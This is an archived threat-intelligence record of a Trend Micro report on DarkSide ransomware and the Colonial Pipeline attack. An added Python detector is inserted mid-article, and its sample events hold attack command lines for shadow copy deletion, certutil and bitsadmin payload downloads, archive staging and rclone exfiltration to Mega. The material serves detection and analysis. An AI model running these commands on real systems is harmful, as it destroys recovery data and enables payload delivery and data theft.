{
	"id": "f5ebcad9-2975-4a41-822d-7db842864e14",
	"created_at": "2026-04-06T00:13:14.128248Z",
	"updated_at": "2026-04-10T03:20:05.303035Z",
	"deleted_at": null,
	"sha1_hash": "706e08c14dec2b95be3830c4cfd5614127c837b2",
	"title": "What We Know About Darkside Ransomware and the US Pipeline Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 985025,
	"plain_text": "What We Know About Darkside Ransomware and the US Pipeline Attack\r\nBy Trend Micro Research\r\nPublished: 2021-05-12 · Archived: 2026-04-05 23:11:15 UTC\r\nUpdated May 17, 2021, 3:25 a.m. Eastern Time: This article has been updated to add references to the DarkSide victim data.\r\nOn May 7, a ransomware attack forced Colonial Pipeline, a company responsible for nearly half the fuel supply for the US East Coast, to proactively shut down operations. Stores of gasoline, diesel, home heating oil, jet fuel, and military supplies were so heavily affected that the Federal Motor Carrier Safety Administration (FMCSA) declared a state of emergency in 18 states to help with the shortages.\r\nIt has been five days since the shutdown prompted by the attack, but Colonial Pipeline is still unable to resume full operations. Outages have already started affecting motorists. In metro Atlanta, 30% of gas stations are without gasoline, and other cities are reporting similar numbers. To keep supplies intact for essential services, the US government has issued advisories against hoarding.\r\nThe FBI has confirmed that DarkSide, a cybercriminal group believed to have originated in Eastern Europe, is behind the attack. The ransomware used by the group is a relatively new family that was first spotted in August 2020, but the group draws on experience from previous financially successful cybercrime enterprises.\r\nApart from locking Colonial Pipeline’s computer systems, DarkSide also stole over 100 GB of corporate data. This data theft is all the more relevant in light of the fact that the group has a history of doubly extorting its victims: not only demanding payment to unlock the affected computers and payment for the captured data, but also threatening to leak the stolen data if the victims do not pay. As we will cover later, DarkSide shows a level of innovation that sets it apart from its competition, being one of the first to offer what we call “quadruple extortion services.”\r\nThe group announced on May 12 that it had three more victims: a construction company based in Scotland, a renewable energy product reseller in Brazil, and a technology services reseller in the US. The DarkSide actors claimed to have stolen a total of 1.9 GB of data from these companies, including sensitive information such as client data, financial data, employee passports, and contracts.\r\nSince DarkSide is a ransomware-as-a-service (RaaS) operation, it is possible that three different affiliate groups are behind these three attacks. Even the DarkSide actors themselves admit that they simply buy access to company networks and have no idea how that access was originally acquired.\r\nTrend Micro Research found dozens of DarkSide ransomware samples in the wild and investigated how the ransomware group operates and what organizations it typically targets.\r\nhttps://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html\r\nPage 1 of 6\r\nThe DarkSide ransomware\r\nDarkSide offers its RaaS to affiliates for a percentage of the profits. The group presents a prime example of modern ransomware, operating with a more advanced business model. Modern ransomware identifies high-value targets and involves more precise monetization of compromised assets (double extortion, for example). Modern ransomware attacks are also typically carried out by several groups that collaborate and split the profits. These attacks may look more like advanced persistent threat (APT) attacks than traditional ransomware events.\r\nHere is a short timeline of DarkSide activity compiled from publicly available reports:\r\nAugust 2020: DarkSide introduces its ransomware.\r\nOctober 2020: DarkSide donates US$20,000 stolen from victims to charity.\r\nNovember 2020: DarkSide establishes its RaaS model and invites other criminals to use its service. A DarkSide data leak site is discovered later.\r\nNovember 2020: DarkSide launches its content delivery network (CDN) for storing and delivering compromised data.\r\nDecember 2020: A DarkSide actor invites media outlets and data recovery organizations to follow the group’s press center on the public leak site.\r\nMarch 2021: DarkSide releases version 2.0 of its ransomware with several updates.\r\nMay 2021: DarkSide launches the Colonial Pipeline attack. After the attack, DarkSide announces that it is apolitical and will start vetting its targets (possibly to avoid drawing attention to future attacks).\r\nInitial access\r\nIn our analysis of DarkSide samples, we saw that phishing, remote desktop protocol (RDP) abuse, and exploitation of known vulnerabilities are the tactics used by the group to gain initial access. The group also uses common, legitimate tools throughout the attack process to remain undetected and obfuscate its activity.\r\nThroughout the reconnaissance and gaining-entry phases, we saw these legitimate tools used for specific purposes:\r\nPowerShell: for reconnaissance and persistence\r\nMetasploit Framework: for reconnaissance\r\nMimikatz: for credential dumping in support of reconnaissance\r\nBloodHound: for Active Directory reconnaissance\r\nCobalt Strike: for installation\r\nFor modern ransomware like DarkSide, gaining initial access no longer immediately leads to ransomware being dropped. There are now several steps in between that are manually executed by an attacker.\r\nLateral movement and privilege escalation\r\nLateral movement is a key discovery phase in the modern ransomware process. In general, the goal is to identify all critical data within the victim organization, including the target files and locations for the upcoming exfiltration and encryption steps.\r\nIn the case of DarkSide, we confirmed reports that the goal of lateral movement is to gain Domain Controller (DC) or Active Directory access, which is then used to steal credentials, escalate privileges, and acquire other valuable assets for data exfiltration. The group continues its lateral movement through the network and eventually uses the DC network share to deploy the ransomware to connected machines. Known lateral movement methods used by DarkSide include PsExec and RDP. But as previously noted, a modern ransomware group behaves with methods more commonly associated with APT groups: it adapts its tooling and methods to the victim’s network defenses.\r\nExfiltration\r\nAs is common practice with double extortion ransomware, critical files are exfiltrated before the ransomware is launched. This is the riskiest step so far in the ransomware execution process, as data exfiltration is more likely to be noticed by the victim organization’s security team. It is the last step before the ransomware is dropped, and the attack often speeds up at this point to complete the process before it can be stopped.\r\nFor exfiltration, we saw the following tools being used:\r\n7-Zip: a utility used for archiving files in preparation for exfiltration\r\nRclone and the Mega client: tools used for exfiltrating files to cloud storage\r\nPuTTY: an alternative application used for network file transfer\r\nDarkSide uses several Tor-based leak sites to host stolen data. The file-sharing services used by the group for data exfiltration include Mega and PrivatLab.\r\nExecution and impact\r\nThe execution of the actual ransomware occurs next. The DarkSide ransomware shares many similarities with REvil in this step of the process, including the structure of its ransom notes and the use of PowerShell to execute a command that deletes Volume Shadow Copies on the host so that encrypted files cannot be restored from local snapshots. It also uses the same code to check that the victim is not located in a Commonwealth of Independent States (CIS) country.\r\nIn addition to PowerShell, which is used to install and operate the malware itself, the group reportedly uses Certutil and Bitsadmin to download the ransomware. It uses two encryption schemes, depending on whether the target operating system is Windows or Linux: a ChaCha20 stream cipher with RSA-4096 on Linux, and Salsa20 with RSA-1024 on Windows. As in other hybrid ransomware schemes, the stream cipher encrypts the file contents while the embedded RSA public key protects the per-file keys, so files cannot be recovered without the actors’ private key.\r\nThe following figure shows a sample ransom note from DarkSide.\r\nIt is interesting to note that DarkSide’s ransom note is similar to that of Babuk, which might indicate that these two families share a link.\r\nDarkSide ransomware targets\r\nBased on the group’s Tor leak sites, DarkSide decides whether to pursue a potential victim organization primarily by looking at that organization’s financial records.
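The tooling named in the Exfiltration and Execution and impact sections (PowerShell or WMI shadow copy deletion, Certutil and Bitsadmin downloads, 7-Zip staging, Rclone uploads to Mega, PsExec) leaves a recognizable trail in process-creation telemetry, which is where a detection engineer would start hunting for a DarkSide-style intrusion before the encryption stage. The block below is an added example written for this page, not code from the article, from Trend Micro, or from DarkSide samples: a small Python detector run over constructed, Sysmon-style process-creation events. The field names, hostnames, file paths, the documentation address 203.0.113.10 and the sample command lines are assumptions; the technique IDs are the standard MITRE ATT\u0026CK IDs for these behaviours.

```python
# Added example: a minimal hunt over process-creation events for the
# living-off-the-land tooling the article attributes to DarkSide intrusions.
# Not code from the article, Trend Micro, or DarkSide samples. All events
# below are constructed; field names mimic Sysmon Event ID 1 (Image,
# CommandLine) and paths use '/' only to keep the sample readable.
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str   # MITRE technique ID plus a short label
    image: str       # process image basename that matched
    command: str     # original command line, kept for the analyst


# Each rule: (technique label, image basenames allowed to launch it,
# substrings that must all occur in the lowercased command line).
# Substring matching keeps the example dependency-free; a production rule
# would parse arguments and handle quoting, caret escapes and -EncodedCommand.
RULES = [
    ('T1490 inhibit system recovery: shadow copy deletion',
     {'powershell.exe', 'pwsh.exe', 'vssadmin.exe', 'wmic.exe'},
     ['shadow', 'delete']),
    ('T1105 ingress tool transfer: certutil download',
     {'certutil.exe'}, ['urlcache', 'http']),
    ('T1105 ingress tool transfer: bitsadmin download',
     {'bitsadmin.exe'}, ['/transfer', 'http']),
    ('T1560.001 archive via utility: password-protected 7-Zip archive',
     {'7z.exe', '7za.exe'}, [' a ', '-p']),
    ('T1567.002 exfiltration to cloud storage: rclone to Mega',
     {'rclone.exe'}, ['copy', 'mega:']),
    ('T1021.002 remote services: PsExec execution',
     {'psexec.exe', 'psexec64.exe'}, []),   # any PsExec launch is worth a look
]


def basename(image):
    # chr(92) is the Windows path separator; written this way so the example
    # contains no backslash escapes. Real telemetry carries full paths.
    return image.lower().replace(chr(92), '/').split('/')[-1]


def analyze(events):
    findings = []
    for ev in events:
        name = basename(ev['image'])
        cmd = ' ' + ev['command_line'].lower() + ' '   # pad so ' a ' matches at the ends
        for technique, images, needles in RULES:
            if name in images and all(n in cmd for n in needles):
                findings.append(Finding(ev['host'], technique, name, ev['command_line']))
    return findings


def by_host(findings):
    # Group technique IDs per host; a host showing recovery inhibition plus
    # staging plus cloud upload is the double-extortion pattern the article describes.
    out = {}
    for f in findings:
        out.setdefault(f.host, []).append(f.technique.split()[0])
    return {host: sorted(ids) for host, ids in out.items()}


# Constructed sample telemetry (not real DarkSide artefacts). 203.0.113.10 is a
# documentation address; hostnames and paths are invented.
SAMPLE_EVENTS = [
    {'host': 'FS01', 'image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'command_line': 'powershell.exe -NoP -W Hidden -C Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}'},
    {'host': 'WS17', 'image': 'C:/Windows/System32/certutil.exe',
     'command_line': 'certutil.exe -urlcache -split -f http://203.0.113.10/upd.exe C:/Users/Public/upd.exe'},
    {'host': 'WS17', 'image': 'C:/Windows/System32/bitsadmin.exe',
     'command_line': 'bitsadmin.exe /transfer job1 /download /priority high http://203.0.113.10/a.dat C:/Users/Public/a.dat'},
    {'host': 'FS01', 'image': 'C:/Users/Public/7z.exe',
     'command_line': '7z.exe a -pStage2021 -mhe=on D:/tmp/finance.7z C:/Shares/Finance'},
    {'host': 'FS01', 'image': 'C:/Users/Public/rclone.exe',
     'command_line': 'rclone.exe copy D:/tmp/finance.7z mega:backup --transfers 8 --config C:/Users/Public/rc.conf'},
    {'host': 'DC01', 'image': 'C:/Tools/PsExec.exe',
     'command_line': 'PsExec.exe -accepteula -s -d -c C:/Tools/run.bat'},
    # Benign administration that must not fire:
    {'host': 'WS22', 'image': 'C:/Windows/System32/certutil.exe',
     'command_line': 'certutil.exe -verify C:/Users/alice/cert.cer'},
    {'host': 'WS22', 'image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'command_line': 'powershell.exe -C Get-ChildItem C:/Shares'},
]

if __name__ == '__main__':
    for f in analyze(SAMPLE_EVENTS):
        print(f.host, f.technique, '<-', f.command)
    print(by_host(analyze(SAMPLE_EVENTS)))
```

Run as a script it lists six findings and leaves the two benign events untouched; the per-host summary is the useful view, because a single file server showing shadow copy deletion, a password-protected archive and an rclone upload within a short window is the staging-then-exfiltration sequence described above. In practice the events would come from Sysmon Event ID 1 or EDR process records, and the RULES list needs tuning, since substrings such as delete and -p will also hit legitimate backup and archiving jobs.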
DarkSide also uses this information to determine the amount of ransom to demand, with a typical demand ranging anywhere between US$200,000 and US$2 million.\r\nReports say that, based on the leak sites, at least 90 victims have been affected by DarkSide. In total, more than 2 TB of stolen data is currently hosted on DarkSide sites, and the stolen files of 100% of the listed victims have been leaked.\r\nThe actors behind DarkSide have stated that they avoid targeting companies in certain industries, including healthcare, education, the public sector, and the nonprofit sector. Organizations in manufacturing, finance, and critical infrastructure have been identified in Trend Micro data as targets.\r\nBased on Trend Micro data, the US is by far DarkSide’s most targeted country, at more than 500 detections, followed by France, Belgium, and Canada. As previously mentioned, DarkSide avoids victimizing companies in CIS countries. Part of the ransomware execution code checks the geolocation of potential victims to avoid companies in these countries, although the group would likely be aware of the location of a target organization long before the ransomware is executed. That the group admittedly spares companies in CIS countries could be a clue to where DarkSide actors reside. It is possible that they do this to avoid law enforcement action from these countries, since the governments of some of them do not prosecute criminal acts such as DarkSide’s when they are committed against foreign targets.\r\nAfter the Colonial Pipeline attack, DarkSide released a statement on one of its leak sites clarifying that the group did not wish to create problems for society and that its goal was simply to make money. There is no way to verify this statement, but we know that the group is still quite active. As previously mentioned, DarkSide actors announced that they had stolen data from three more victims since the Colonial Pipeline attack.\r\nMITRE ATT\u0026CK tactics and techniques\r\nThe following are the MITRE ATT\u0026CK tactics and techniques associated with DarkSide.\r\nConclusion\r\nRansomware is an old but persistently evolving threat. As demonstrated by the recent activities of DarkSide, modern ransomware has changed in many aspects: bigger targets, more advanced extortion techniques, and farther-reaching consequences beyond the victims themselves.\r\nRansomware actors are no longer content with simply locking companies out of their computers and asking for ransom. Now they are digging deeper into their victims’ networks and looking for new ways to monetize their activities. For example, a compromised cloud server can go through a complete attack life cycle, from the initial compromise to data exfiltration to resale or use for further monetization. Compromised enterprise assets are a lucrative commodity on underground markets; cybercriminals are well aware of how to make money from attacking company servers.\r\nIn the Colonial Pipeline attack, DarkSide used double extortion. But some ransomware actors have gone even further. Jon Clay, Director of Global Threat Communications at Trend Micro, outlines the phases of ransomware:\r\nPhase 1: Just ransomware. Encrypt the files, drop the ransom note, and wait for the payment.\r\nPhase 2: Double extortion. Phase 1 + data exfiltration and threatening data release. Maze was one of the first documented cases of this.\r\nPhase 3: Triple extortion. Phase 1 + Phase 2 + threatening DDoS. SunCrypt, RagnarLocker, and Avaddon were among the first groups documented doing this.\r\nPhase 4: Quadruple extortion. Phase 1 (+ possibly Phase 2 or Phase 3) + directly emailing the victim’s customer base or having contracted call centers contact customers.\r\nIn fact, as detailed in security reports, DarkSide offers both the DDoS and call center options. The group is making quadruple extortion available to its affiliates, a clear sign of innovation. In cybercrime, there are no copyright or patent laws for tools and techniques. Innovation is as much about quickly and completely copying others’ best practices as it is about coming up with new approaches.\r\nRansomware will only continue to evolve. Organizations therefore need to take the time to put in place an incident response plan focused on the new model of ransomware attacks. Unfortunately, some organizations may be putting cybersecurity on the back burner. For example, some security experts noted that Colonial Pipeline was running a version of Microsoft Exchange with previously exploited vulnerabilities, among other cybersecurity lapses. A successful attack on a company providing critical services will have rippling effects that harm multiple sectors of society, which is why protecting these services should be a top priority.\r\nIn a US Senate hearing on cybersecurity threats, Senator Rob Portman of Ohio described the strike on Colonial Pipeline as “potentially the most substantial and damaging attack on US critical infrastructure ever.” This attack is a call to action for all organizations to harden their networks against attacks and improve their network visibility.\r\nTrend Micro has a multilayered cybersecurity platform that can help improve your organization’s detection and response against the latest ransomware attacks and improve your organization’s visibility. Visit the Trend Micro Vision One™ products website for more information. Detailed solutions can be found in our knowledge base article on DarkSide ransomware.\r\nSource: https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html"
	],
	"report_names": [
		"what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434394,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/706e08c14dec2b95be3830c4cfd5614127c837b2.pdf",
		"text": "https://archive.orkl.eu/706e08c14dec2b95be3830c4cfd5614127c837b2.txt",
		"img": "https://archive.orkl.eu/706e08c14dec2b95be3830c4cfd5614127c837b2.jpg"
	}
}